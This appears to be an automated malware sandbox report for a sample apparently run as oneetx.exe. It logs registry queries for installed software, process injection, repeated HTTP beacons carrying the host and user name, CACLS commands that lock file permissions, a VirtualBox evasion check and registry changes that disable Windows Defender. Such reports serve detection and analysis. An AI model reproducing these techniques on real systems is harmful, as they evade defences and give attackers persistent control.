RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1

Network activity contains more than one unique useragent (2 events)

process	WWW14_n.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process	oneetx.exe				useragent

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2520 called NtSetContextThread to modify thread in remote process 1140
NtSetContextThread Sept. 6, 2023, 2:04 p.m.	registers.eip: 1995571652 registers.esp: 3275672 registers.edi: 0 registers.eax: 4510606 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000070 process_identifier: 1140	1	0	0

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (39 events)

Time & API	Arguments	Status	Return
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA Sept. 6, 2023, 2:05 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.83&sd=d122c5&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2520 resumed a thread in remote process 1140
NtResumeThread Sept. 6, 2023, 2:04 p.m.	thread_handle: 0x00000070 suspend_count: 1 process_identifier: 1140	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline	CACLS "..\207aa4515d" /P "test22:R" /E
cmdline	CACLS "oneetx.exe" /P "test22:N"
cmdline	CACLS "..\207aa4515d" /P "test22:N"
cmdline	cmd /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline	CACLS "oneetx.exe" /P "test22:R" /E

Detects VirtualBox using WNetGetProviderName trick (1 event)

Time & API	Arguments	Status	Return	Repeated
WNetGetProviderNameW Sept. 6, 2023, 2:04 p.m.	net_type: 0x00250000		1222	0

Disables Windows Security features (30 events)

description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DFE1A6BD-F212-4EB0-858F-F92AAE5118A5}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{FFF846BA-99D4-4CA1-A396-5A61FB5857FD}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
